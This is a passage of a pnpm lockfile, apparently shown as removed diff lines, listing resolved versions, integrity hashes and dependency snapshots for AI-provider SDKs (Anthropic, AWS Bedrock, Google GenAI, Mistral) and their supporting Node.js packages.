source-map@0.6.1: - resolution: {integrity: sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==} - engines: {node: '>=0.10.0'} - - string-width@4.2.3: - resolution: {integrity: sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==} - engines: {node: '>=8'} - - string-width@5.1.2: - resolution: {integrity: 
sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==} - engines: {node: '>=12'} - - strip-ansi@6.0.1: - resolution: {integrity: sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==} - engines: {node: '>=8'} - - strip-ansi@7.2.0: - resolution: {integrity: sha512-yDPMNjp4WyfYBkHnjIRLfca1i6KMyGCtsVgoKe/z1+6vukgaENdgGBZt+ZmKPc4gavvEZ5OgHfHdrazhgNyG7w==} - engines: {node: '>=12'} - - strnum@2.2.0: - resolution: {integrity: sha512-Y7Bj8XyJxnPAORMZj/xltsfo55uOiyHcU2tnAVzHUnSJR/KsEX+9RoDeXEnsXtl/CX4fAcrt64gZ13aGaWPeBg==} - - ts-algebra@2.0.0: - resolution: {integrity: sha512-FPAhNPFMrkwz76P7cdjdmiShwMynZYN6SgOujD1urY4oNm80Ou9oMdmbR45LotcKOXoy7wSmHkRFE6Mxbrhefw==} - - tslib@2.8.1: - resolution: {integrity: sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==} - - undici-types@7.18.2: - resolution: {integrity: sha512-AsuCzffGHJybSaRrmr5eHr81mwJU3kjw6M+uprWvCXiNeN9SOGwQ3Jn8jb8m3Z6izVgknn1R0FTCEAP2QrLY/w==} - - undici@7.24.4: - resolution: {integrity: sha512-BM/JzwwaRXxrLdElV2Uo6cTLEjhSb3WXboncJamZ15NgUURmvlXvxa6xkwIOILIjPNo9i8ku136ZvWV0Uly8+w==} - engines: {node: '>=20.18.1'} - - web-streams-polyfill@3.3.3: - resolution: {integrity: sha512-d2JWLCivmZYTSIoge9MsgFCZrt571BikcWGYkjC1khllbTeDlGqZ2D8vD8E/lJa8WGWbb7Plm8/XJYV7IJHZZw==} - engines: {node: '>= 8'} - - which@2.0.2: - resolution: {integrity: sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==} - engines: {node: '>= 8'} - hasBin: true - - wrap-ansi@7.0.0: - resolution: {integrity: sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==} - engines: {node: '>=10'} - - wrap-ansi@8.1.0: - resolution: {integrity: sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==} - engines: {node: '>=12'} - - ws@8.19.0: - resolution: {integrity: 
sha512-blAT2mjOEIi0ZzruJfIhb3nps74PRWTCz1IjglWEEpQl5XS/UNama6u2/rjFkDDouqr4L67ry+1aGIALViWjDg==} - engines: {node: '>=10.0.0'} - peerDependencies: - bufferutil: ^4.0.1 - utf-8-validate: '>=5.0.2' - peerDependenciesMeta: - bufferutil: - optional: true - utf-8-validate: - optional: true - - zod-to-json-schema@3.25.1: - resolution: {integrity: sha512-pM/SU9d3YAggzi6MtR4h7ruuQlqKtad8e9S0fmxcMi+ueAK5Korys/aWcV9LIIHTVbj01NdzxcnXSN+O74ZIVA==} - peerDependencies: - zod: ^3.25 || ^4 - - zod@4.3.6: - resolution: {integrity: sha512-rftlrkhHZOcjDwkGlnUtZZkvaPHCsDATp4pGpuOOMDaTdDDXF91wuVDJoWoPsKX/3YPQ5fHuF3STjcYyKr+Qhg==} - -snapshots: - - '@anthropic-ai/sdk@0.73.0(zod@4.3.6)': - dependencies: - json-schema-to-ts: 3.1.1 - optionalDependencies: - zod: 4.3.6 - - '@aws-crypto/crc32@5.2.0': - dependencies: - '@aws-crypto/util': 5.2.0 - '@aws-sdk/types': 3.973.6 - tslib: 2.8.1 - - '@aws-crypto/sha256-browser@5.2.0': - dependencies: - '@aws-crypto/sha256-js': 5.2.0 - '@aws-crypto/supports-web-crypto': 5.2.0 - '@aws-crypto/util': 5.2.0 - '@aws-sdk/types': 3.973.6 - '@aws-sdk/util-locate-window': 3.965.5 - '@smithy/util-utf8': 2.3.0 - tslib: 2.8.1 - - '@aws-crypto/sha256-js@5.2.0': - dependencies: - '@aws-crypto/util': 5.2.0 - '@aws-sdk/types': 3.973.6 - tslib: 2.8.1 - - '@aws-crypto/supports-web-crypto@5.2.0': - dependencies: - tslib: 2.8.1 - - '@aws-crypto/util@5.2.0': - dependencies: - '@aws-sdk/types': 3.973.6 - '@smithy/util-utf8': 2.3.0 - tslib: 2.8.1 - - '@aws-sdk/client-bedrock-runtime@3.1009.0': - dependencies: - '@aws-crypto/sha256-browser': 5.2.0 - '@aws-crypto/sha256-js': 5.2.0 - '@aws-sdk/core': 3.973.20 - '@aws-sdk/credential-provider-node': 3.972.21 - '@aws-sdk/eventstream-handler-node': 3.972.11 - '@aws-sdk/middleware-eventstream': 3.972.8 - '@aws-sdk/middleware-host-header': 3.972.8 - '@aws-sdk/middleware-logger': 3.972.8 - '@aws-sdk/middleware-recursion-detection': 3.972.8 - '@aws-sdk/middleware-user-agent': 3.972.21 - '@aws-sdk/middleware-websocket': 3.972.13 - 
'@aws-sdk/region-config-resolver': 3.972.8 - '@aws-sdk/token-providers': 3.1009.0 - '@aws-sdk/types': 3.973.6 - '@aws-sdk/util-endpoints': 3.996.5 - '@aws-sdk/util-user-agent-browser': 3.972.8 - '@aws-sdk/util-user-agent-node': 3.973.7 - '@smithy/config-resolver': 4.4.11 - '@smithy/core': 3.23.12 - '@smithy/eventstream-serde-browser': 4.2.12 - '@smithy/eventstream-serde-config-resolver': 4.3.12 - '@smithy/eventstream-serde-node': 4.2.12 - '@smithy/fetch-http-handler': 5.3.15 - '@smithy/hash-node': 4.2.12 - '@smithy/invalid-dependency': 4.2.12 - '@smithy/middleware-content-length': 4.2.12 - '@smithy/middleware-endpoint': 4.4.26 - '@smithy/middleware-retry': 4.4.43 - '@smithy/middleware-serde': 4.2.15 - '@smithy/middleware-stack': 4.2.12 - '@smithy/node-config-provider': 4.3.12 - '@smithy/node-http-handler': 4.5.0 - '@smithy/protocol-http': 5.3.12 - '@smithy/smithy-client': 4.12.6 - '@smithy/types': 4.13.1 - '@smithy/url-parser': 4.2.12 - '@smithy/util-base64': 4.3.2 - '@smithy/util-body-length-browser': 4.2.2 - '@smithy/util-body-length-node': 4.2.3 - '@smithy/util-defaults-mode-browser': 4.3.42 - '@smithy/util-defaults-mode-node': 4.2.45 - '@smithy/util-endpoints': 3.3.3 - '@smithy/util-middleware': 4.2.12 - '@smithy/util-retry': 4.2.12 - '@smithy/util-stream': 4.5.20 - '@smithy/util-utf8': 4.2.2 - tslib: 2.8.1 - transitivePeerDependencies: - - aws-crt - - '@aws-sdk/core@3.973.20': - dependencies: - '@aws-sdk/types': 3.973.6 - '@aws-sdk/xml-builder': 3.972.11 - '@smithy/core': 3.23.12 - '@smithy/node-config-provider': 4.3.12 - '@smithy/property-provider': 4.2.12 - '@smithy/protocol-http': 5.3.12 - '@smithy/signature-v4': 5.3.12 - '@smithy/smithy-client': 4.12.6 - '@smithy/types': 4.13.1 - '@smithy/util-base64': 4.3.2 - '@smithy/util-middleware': 4.2.12 - '@smithy/util-utf8': 4.2.2 - tslib: 2.8.1 - - '@aws-sdk/credential-provider-env@3.972.18': - dependencies: - '@aws-sdk/core': 3.973.20 - '@aws-sdk/types': 3.973.6 - '@smithy/property-provider': 4.2.12 - 
'@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/credential-provider-http@3.972.20': - dependencies: - '@aws-sdk/core': 3.973.20 - '@aws-sdk/types': 3.973.6 - '@smithy/fetch-http-handler': 5.3.15 - '@smithy/node-http-handler': 4.5.0 - '@smithy/property-provider': 4.2.12 - '@smithy/protocol-http': 5.3.12 - '@smithy/smithy-client': 4.12.6 - '@smithy/types': 4.13.1 - '@smithy/util-stream': 4.5.20 - tslib: 2.8.1 - - '@aws-sdk/credential-provider-ini@3.972.20': - dependencies: - '@aws-sdk/core': 3.973.20 - '@aws-sdk/credential-provider-env': 3.972.18 - '@aws-sdk/credential-provider-http': 3.972.20 - '@aws-sdk/credential-provider-login': 3.972.20 - '@aws-sdk/credential-provider-process': 3.972.18 - '@aws-sdk/credential-provider-sso': 3.972.20 - '@aws-sdk/credential-provider-web-identity': 3.972.20 - '@aws-sdk/nested-clients': 3.996.10 - '@aws-sdk/types': 3.973.6 - '@smithy/credential-provider-imds': 4.2.12 - '@smithy/property-provider': 4.2.12 - '@smithy/shared-ini-file-loader': 4.4.7 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - transitivePeerDependencies: - - aws-crt - - '@aws-sdk/credential-provider-login@3.972.20': - dependencies: - '@aws-sdk/core': 3.973.20 - '@aws-sdk/nested-clients': 3.996.10 - '@aws-sdk/types': 3.973.6 - '@smithy/property-provider': 4.2.12 - '@smithy/protocol-http': 5.3.12 - '@smithy/shared-ini-file-loader': 4.4.7 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - transitivePeerDependencies: - - aws-crt - - '@aws-sdk/credential-provider-node@3.972.21': - dependencies: - '@aws-sdk/credential-provider-env': 3.972.18 - '@aws-sdk/credential-provider-http': 3.972.20 - '@aws-sdk/credential-provider-ini': 3.972.20 - '@aws-sdk/credential-provider-process': 3.972.18 - '@aws-sdk/credential-provider-sso': 3.972.20 - '@aws-sdk/credential-provider-web-identity': 3.972.20 - '@aws-sdk/types': 3.973.6 - '@smithy/credential-provider-imds': 4.2.12 - '@smithy/property-provider': 4.2.12 - '@smithy/shared-ini-file-loader': 4.4.7 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - 
transitivePeerDependencies: - - aws-crt - - '@aws-sdk/credential-provider-process@3.972.18': - dependencies: - '@aws-sdk/core': 3.973.20 - '@aws-sdk/types': 3.973.6 - '@smithy/property-provider': 4.2.12 - '@smithy/shared-ini-file-loader': 4.4.7 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/credential-provider-sso@3.972.20': - dependencies: - '@aws-sdk/core': 3.973.20 - '@aws-sdk/nested-clients': 3.996.10 - '@aws-sdk/token-providers': 3.1009.0 - '@aws-sdk/types': 3.973.6 - '@smithy/property-provider': 4.2.12 - '@smithy/shared-ini-file-loader': 4.4.7 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - transitivePeerDependencies: - - aws-crt - - '@aws-sdk/credential-provider-web-identity@3.972.20': - dependencies: - '@aws-sdk/core': 3.973.20 - '@aws-sdk/nested-clients': 3.996.10 - '@aws-sdk/types': 3.973.6 - '@smithy/property-provider': 4.2.12 - '@smithy/shared-ini-file-loader': 4.4.7 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - transitivePeerDependencies: - - aws-crt - - '@aws-sdk/eventstream-handler-node@3.972.11': - dependencies: - '@aws-sdk/types': 3.973.6 - '@smithy/eventstream-codec': 4.2.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/middleware-eventstream@3.972.8': - dependencies: - '@aws-sdk/types': 3.973.6 - '@smithy/protocol-http': 5.3.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/middleware-host-header@3.972.8': - dependencies: - '@aws-sdk/types': 3.973.6 - '@smithy/protocol-http': 5.3.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/middleware-logger@3.972.8': - dependencies: - '@aws-sdk/types': 3.973.6 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/middleware-recursion-detection@3.972.8': - dependencies: - '@aws-sdk/types': 3.973.6 - '@aws/lambda-invoke-store': 0.2.4 - '@smithy/protocol-http': 5.3.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/middleware-user-agent@3.972.21': - dependencies: - '@aws-sdk/core': 3.973.20 - '@aws-sdk/types': 3.973.6 - '@aws-sdk/util-endpoints': 3.996.5 - '@smithy/core': 
3.23.12 - '@smithy/protocol-http': 5.3.12 - '@smithy/types': 4.13.1 - '@smithy/util-retry': 4.2.12 - tslib: 2.8.1 - - '@aws-sdk/middleware-websocket@3.972.13': - dependencies: - '@aws-sdk/types': 3.973.6 - '@aws-sdk/util-format-url': 3.972.8 - '@smithy/eventstream-codec': 4.2.12 - '@smithy/eventstream-serde-browser': 4.2.12 - '@smithy/fetch-http-handler': 5.3.15 - '@smithy/protocol-http': 5.3.12 - '@smithy/signature-v4': 5.3.12 - '@smithy/types': 4.13.1 - '@smithy/util-base64': 4.3.2 - '@smithy/util-hex-encoding': 4.2.2 - '@smithy/util-utf8': 4.2.2 - tslib: 2.8.1 - - '@aws-sdk/nested-clients@3.996.10': - dependencies: - '@aws-crypto/sha256-browser': 5.2.0 - '@aws-crypto/sha256-js': 5.2.0 - '@aws-sdk/core': 3.973.20 - '@aws-sdk/middleware-host-header': 3.972.8 - '@aws-sdk/middleware-logger': 3.972.8 - '@aws-sdk/middleware-recursion-detection': 3.972.8 - '@aws-sdk/middleware-user-agent': 3.972.21 - '@aws-sdk/region-config-resolver': 3.972.8 - '@aws-sdk/types': 3.973.6 - '@aws-sdk/util-endpoints': 3.996.5 - '@aws-sdk/util-user-agent-browser': 3.972.8 - '@aws-sdk/util-user-agent-node': 3.973.7 - '@smithy/config-resolver': 4.4.11 - '@smithy/core': 3.23.12 - '@smithy/fetch-http-handler': 5.3.15 - '@smithy/hash-node': 4.2.12 - '@smithy/invalid-dependency': 4.2.12 - '@smithy/middleware-content-length': 4.2.12 - '@smithy/middleware-endpoint': 4.4.26 - '@smithy/middleware-retry': 4.4.43 - '@smithy/middleware-serde': 4.2.15 - '@smithy/middleware-stack': 4.2.12 - '@smithy/node-config-provider': 4.3.12 - '@smithy/node-http-handler': 4.5.0 - '@smithy/protocol-http': 5.3.12 - '@smithy/smithy-client': 4.12.6 - '@smithy/types': 4.13.1 - '@smithy/url-parser': 4.2.12 - '@smithy/util-base64': 4.3.2 - '@smithy/util-body-length-browser': 4.2.2 - '@smithy/util-body-length-node': 4.2.3 - '@smithy/util-defaults-mode-browser': 4.3.42 - '@smithy/util-defaults-mode-node': 4.2.45 - '@smithy/util-endpoints': 3.3.3 - '@smithy/util-middleware': 4.2.12 - '@smithy/util-retry': 4.2.12 - 
'@smithy/util-utf8': 4.2.2 - tslib: 2.8.1 - transitivePeerDependencies: - - aws-crt - - '@aws-sdk/region-config-resolver@3.972.8': - dependencies: - '@aws-sdk/types': 3.973.6 - '@smithy/config-resolver': 4.4.11 - '@smithy/node-config-provider': 4.3.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/token-providers@3.1009.0': - dependencies: - '@aws-sdk/core': 3.973.20 - '@aws-sdk/nested-clients': 3.996.10 - '@aws-sdk/types': 3.973.6 - '@smithy/property-provider': 4.2.12 - '@smithy/shared-ini-file-loader': 4.4.7 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - transitivePeerDependencies: - - aws-crt - - '@aws-sdk/types@3.973.6': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/util-endpoints@3.996.5': - dependencies: - '@aws-sdk/types': 3.973.6 - '@smithy/types': 4.13.1 - '@smithy/url-parser': 4.2.12 - '@smithy/util-endpoints': 3.3.3 - tslib: 2.8.1 - - '@aws-sdk/util-format-url@3.972.8': - dependencies: - '@aws-sdk/types': 3.973.6 - '@smithy/querystring-builder': 4.2.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@aws-sdk/util-locate-window@3.965.5': - dependencies: - tslib: 2.8.1 - - '@aws-sdk/util-user-agent-browser@3.972.8': - dependencies: - '@aws-sdk/types': 3.973.6 - '@smithy/types': 4.13.1 - bowser: 2.14.1 - tslib: 2.8.1 - - '@aws-sdk/util-user-agent-node@3.973.7': - dependencies: - '@aws-sdk/middleware-user-agent': 3.972.21 - '@aws-sdk/types': 3.973.6 - '@smithy/node-config-provider': 4.3.12 - '@smithy/types': 4.13.1 - '@smithy/util-config-provider': 4.2.2 - tslib: 2.8.1 - - '@aws-sdk/xml-builder@3.972.11': - dependencies: - '@smithy/types': 4.13.1 - fast-xml-parser: 5.4.1 - tslib: 2.8.1 - - '@aws/lambda-invoke-store@0.2.4': {} - - '@babel/runtime@7.28.6': {} - - '@google/genai@1.45.0': - dependencies: - google-auth-library: 10.6.1 - p-retry: 4.6.2 - protobufjs: 7.5.4 - ws: 8.19.0 - transitivePeerDependencies: - - bufferutil - - supports-color - - utf-8-validate - - '@isaacs/cliui@8.0.2': - dependencies: - string-width: 5.1.2 - 
string-width-cjs: string-width@4.2.3 - strip-ansi: 7.2.0 - strip-ansi-cjs: strip-ansi@6.0.1 - wrap-ansi: 8.1.0 - wrap-ansi-cjs: wrap-ansi@7.0.0 - - '@mistralai/mistralai@1.14.1': - dependencies: - ws: 8.19.0 - zod: 4.3.6 - zod-to-json-schema: 3.25.1(zod@4.3.6) - transitivePeerDependencies: - - bufferutil - - utf-8-validate - - '@pkgjs/parseargs@0.11.0': - optional: true - - '@protobufjs/aspromise@1.1.2': {} - - '@protobufjs/base64@1.1.2': {} - - '@protobufjs/codegen@2.0.4': {} - - '@protobufjs/eventemitter@1.1.0': {} - - '@protobufjs/fetch@1.1.0': - dependencies: - '@protobufjs/aspromise': 1.1.2 - '@protobufjs/inquire': 1.1.0 - - '@protobufjs/float@1.0.2': {} - - '@protobufjs/inquire@1.1.0': {} - - '@protobufjs/path@1.1.2': {} - - '@protobufjs/pool@1.1.0': {} - - '@protobufjs/utf8@1.1.0': {} - - '@sinclair/typebox@0.34.48': {} - - '@smithy/abort-controller@4.2.12': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/config-resolver@4.4.11': - dependencies: - '@smithy/node-config-provider': 4.3.12 - '@smithy/types': 4.13.1 - '@smithy/util-config-provider': 4.2.2 - '@smithy/util-endpoints': 3.3.3 - '@smithy/util-middleware': 4.2.12 - tslib: 2.8.1 - - '@smithy/core@3.23.12': - dependencies: - '@smithy/protocol-http': 5.3.12 - '@smithy/types': 4.13.1 - '@smithy/url-parser': 4.2.12 - '@smithy/util-base64': 4.3.2 - '@smithy/util-body-length-browser': 4.2.2 - '@smithy/util-middleware': 4.2.12 - '@smithy/util-stream': 4.5.20 - '@smithy/util-utf8': 4.2.2 - '@smithy/uuid': 1.1.2 - tslib: 2.8.1 - - '@smithy/credential-provider-imds@4.2.12': - dependencies: - '@smithy/node-config-provider': 4.3.12 - '@smithy/property-provider': 4.2.12 - '@smithy/types': 4.13.1 - '@smithy/url-parser': 4.2.12 - tslib: 2.8.1 - - '@smithy/eventstream-codec@4.2.12': - dependencies: - '@aws-crypto/crc32': 5.2.0 - '@smithy/types': 4.13.1 - '@smithy/util-hex-encoding': 4.2.2 - tslib: 2.8.1 - - '@smithy/eventstream-serde-browser@4.2.12': - dependencies: - 
'@smithy/eventstream-serde-universal': 4.2.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/eventstream-serde-config-resolver@4.3.12': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/eventstream-serde-node@4.2.12': - dependencies: - '@smithy/eventstream-serde-universal': 4.2.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/eventstream-serde-universal@4.2.12': - dependencies: - '@smithy/eventstream-codec': 4.2.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/fetch-http-handler@5.3.15': - dependencies: - '@smithy/protocol-http': 5.3.12 - '@smithy/querystring-builder': 4.2.12 - '@smithy/types': 4.13.1 - '@smithy/util-base64': 4.3.2 - tslib: 2.8.1 - - '@smithy/hash-node@4.2.12': - dependencies: - '@smithy/types': 4.13.1 - '@smithy/util-buffer-from': 4.2.2 - '@smithy/util-utf8': 4.2.2 - tslib: 2.8.1 - - '@smithy/invalid-dependency@4.2.12': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/is-array-buffer@2.2.0': - dependencies: - tslib: 2.8.1 - - '@smithy/is-array-buffer@4.2.2': - dependencies: - tslib: 2.8.1 - - '@smithy/middleware-content-length@4.2.12': - dependencies: - '@smithy/protocol-http': 5.3.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/middleware-endpoint@4.4.26': - dependencies: - '@smithy/core': 3.23.12 - '@smithy/middleware-serde': 4.2.15 - '@smithy/node-config-provider': 4.3.12 - '@smithy/shared-ini-file-loader': 4.4.7 - '@smithy/types': 4.13.1 - '@smithy/url-parser': 4.2.12 - '@smithy/util-middleware': 4.2.12 - tslib: 2.8.1 - - '@smithy/middleware-retry@4.4.43': - dependencies: - '@smithy/node-config-provider': 4.3.12 - '@smithy/protocol-http': 5.3.12 - '@smithy/service-error-classification': 4.2.12 - '@smithy/smithy-client': 4.12.6 - '@smithy/types': 4.13.1 - '@smithy/util-middleware': 4.2.12 - '@smithy/util-retry': 4.2.12 - '@smithy/uuid': 1.1.2 - tslib: 2.8.1 - - '@smithy/middleware-serde@4.2.15': - dependencies: - '@smithy/core': 3.23.12 - '@smithy/protocol-http': 5.3.12 - 
'@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/middleware-stack@4.2.12': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/node-config-provider@4.3.12': - dependencies: - '@smithy/property-provider': 4.2.12 - '@smithy/shared-ini-file-loader': 4.4.7 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/node-http-handler@4.5.0': - dependencies: - '@smithy/abort-controller': 4.2.12 - '@smithy/protocol-http': 5.3.12 - '@smithy/querystring-builder': 4.2.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/property-provider@4.2.12': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/protocol-http@5.3.12': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/querystring-builder@4.2.12': - dependencies: - '@smithy/types': 4.13.1 - '@smithy/util-uri-escape': 4.2.2 - tslib: 2.8.1 - - '@smithy/querystring-parser@4.2.12': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/service-error-classification@4.2.12': - dependencies: - '@smithy/types': 4.13.1 - - '@smithy/shared-ini-file-loader@4.4.7': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/signature-v4@5.3.12': - dependencies: - '@smithy/is-array-buffer': 4.2.2 - '@smithy/protocol-http': 5.3.12 - '@smithy/types': 4.13.1 - '@smithy/util-hex-encoding': 4.2.2 - '@smithy/util-middleware': 4.2.12 - '@smithy/util-uri-escape': 4.2.2 - '@smithy/util-utf8': 4.2.2 - tslib: 2.8.1 - - '@smithy/smithy-client@4.12.6': - dependencies: - '@smithy/core': 3.23.12 - '@smithy/middleware-endpoint': 4.4.26 - '@smithy/middleware-stack': 4.2.12 - '@smithy/protocol-http': 5.3.12 - '@smithy/types': 4.13.1 - '@smithy/util-stream': 4.5.20 - tslib: 2.8.1 - - '@smithy/types@4.13.1': - dependencies: - tslib: 2.8.1 - - '@smithy/url-parser@4.2.12': - dependencies: - '@smithy/querystring-parser': 4.2.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/util-base64@4.3.2': - dependencies: - '@smithy/util-buffer-from': 4.2.2 - '@smithy/util-utf8': 4.2.2 
- tslib: 2.8.1 - - '@smithy/util-body-length-browser@4.2.2': - dependencies: - tslib: 2.8.1 - - '@smithy/util-body-length-node@4.2.3': - dependencies: - tslib: 2.8.1 - - '@smithy/util-buffer-from@2.2.0': - dependencies: - '@smithy/is-array-buffer': 2.2.0 - tslib: 2.8.1 - - '@smithy/util-buffer-from@4.2.2': - dependencies: - '@smithy/is-array-buffer': 4.2.2 - tslib: 2.8.1 - - '@smithy/util-config-provider@4.2.2': - dependencies: - tslib: 2.8.1 - - '@smithy/util-defaults-mode-browser@4.3.42': - dependencies: - '@smithy/property-provider': 4.2.12 - '@smithy/smithy-client': 4.12.6 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/util-defaults-mode-node@4.2.45': - dependencies: - '@smithy/config-resolver': 4.4.11 - '@smithy/credential-provider-imds': 4.2.12 - '@smithy/node-config-provider': 4.3.12 - '@smithy/property-provider': 4.2.12 - '@smithy/smithy-client': 4.12.6 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/util-endpoints@3.3.3': - dependencies: - '@smithy/node-config-provider': 4.3.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/util-hex-encoding@4.2.2': - dependencies: - tslib: 2.8.1 - - '@smithy/util-middleware@4.2.12': - dependencies: - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/util-retry@4.2.12': - dependencies: - '@smithy/service-error-classification': 4.2.12 - '@smithy/types': 4.13.1 - tslib: 2.8.1 - - '@smithy/util-stream@4.5.20': - dependencies: - '@smithy/fetch-http-handler': 5.3.15 - '@smithy/node-http-handler': 4.5.0 - '@smithy/types': 4.13.1 - '@smithy/util-base64': 4.3.2 - '@smithy/util-buffer-from': 4.2.2 - '@smithy/util-hex-encoding': 4.2.2 - '@smithy/util-utf8': 4.2.2 - tslib: 2.8.1 - - '@smithy/util-uri-escape@4.2.2': - dependencies: - tslib: 2.8.1 - - '@smithy/util-utf8@2.3.0': - dependencies: - '@smithy/util-buffer-from': 2.2.0 - tslib: 2.8.1 - - '@smithy/util-utf8@4.2.2': - dependencies: - '@smithy/util-buffer-from': 4.2.2 - tslib: 2.8.1 - - '@smithy/uuid@1.1.2': - dependencies: - tslib: 2.8.1 - - 
'@tootallnate/quickjs-emscripten@0.23.0': {} - - '@types/node@25.5.0': - dependencies: - undici-types: 7.18.2 - - '@types/retry@0.12.0': {} - - agent-base@7.1.4: {} - - ajv-formats@3.0.1(ajv@8.18.0): - optionalDependencies: - ajv: 8.18.0 - - ajv@8.18.0: - dependencies: - fast-deep-equal: 3.1.3 - fast-uri: 3.1.0 - json-schema-traverse: 1.0.0 - require-from-string: 2.0.2 - - ansi-regex@5.0.1: {} - - ansi-regex@6.2.2: {} - - ansi-styles@4.3.0: - dependencies: - color-convert: 2.0.1 - - ansi-styles@6.2.3: {} - - ast-types@0.13.4: - dependencies: - tslib: 2.8.1 - - balanced-match@1.0.2: {} - - base64-js@1.5.1: {} - - basic-ftp@5.2.0: {} - - bignumber.js@9.3.1: {} - - bowser@2.14.1: {} - - brace-expansion@2.0.2: - dependencies: - balanced-match: 1.0.2 - - buffer-equal-constant-time@1.0.1: {} - - chalk@5.6.2: {} - - color-convert@2.0.1: - dependencies: - color-name: 1.1.4 - - color-name@1.1.4: {} - - cross-spawn@7.0.6: - dependencies: - path-key: 3.1.1 - shebang-command: 2.0.0 - which: 2.0.2 - - data-uri-to-buffer@4.0.1: {} - - data-uri-to-buffer@6.0.2: {} - - debug@4.4.3: - dependencies: - ms: 2.1.3 - - degenerator@5.0.1: - dependencies: - ast-types: 0.13.4 - escodegen: 2.1.0 - esprima: 4.0.1 - - eastasianwidth@0.2.0: {} - - ecdsa-sig-formatter@1.0.11: - dependencies: - safe-buffer: 5.2.1 - - emoji-regex@8.0.0: {} - - emoji-regex@9.2.2: {} - - escodegen@2.1.0: - dependencies: - esprima: 4.0.1 - estraverse: 5.3.0 - esutils: 2.0.3 - optionalDependencies: - source-map: 0.6.1 - - esprima@4.0.1: {} - - estraverse@5.3.0: {} - - esutils@2.0.3: {} - - extend@3.0.2: {} - - fast-deep-equal@3.1.3: {} - - fast-uri@3.1.0: {} - - fast-xml-builder@1.1.4: - dependencies: - path-expression-matcher: 1.1.3 - - fast-xml-parser@5.4.1: - dependencies: - fast-xml-builder: 1.1.4 - strnum: 2.2.0 - - fetch-blob@3.2.0: - dependencies: - node-domexception: 1.0.0 - web-streams-polyfill: 3.3.3 - - foreground-child@3.3.1: - dependencies: - cross-spawn: 7.0.6 - signal-exit: 4.1.0 - - 
formdata-polyfill@4.0.10: - dependencies: - fetch-blob: 3.2.0 - - gaxios@7.1.3: - dependencies: - extend: 3.0.2 - https-proxy-agent: 7.0.6 - node-fetch: 3.3.2 - rimraf: 5.0.10 - transitivePeerDependencies: - - supports-color - - gcp-metadata@8.1.2: - dependencies: - gaxios: 7.1.3 - google-logging-utils: 1.1.3 - json-bigint: 1.0.0 - transitivePeerDependencies: - - supports-color - - get-uri@6.0.5: - dependencies: - basic-ftp: 5.2.0 - data-uri-to-buffer: 6.0.2 - debug: 4.4.3 - transitivePeerDependencies: - - supports-color - - glob@10.5.0: - dependencies: - foreground-child: 3.3.1 - jackspeak: 3.4.3 - minimatch: 9.0.9 - minipass: 7.1.3 - package-json-from-dist: 1.0.1 - path-scurry: 1.11.1 - - google-auth-library@10.6.1: - dependencies: - base64-js: 1.5.1 - ecdsa-sig-formatter: 1.0.11 - gaxios: 7.1.3 - gcp-metadata: 8.1.2 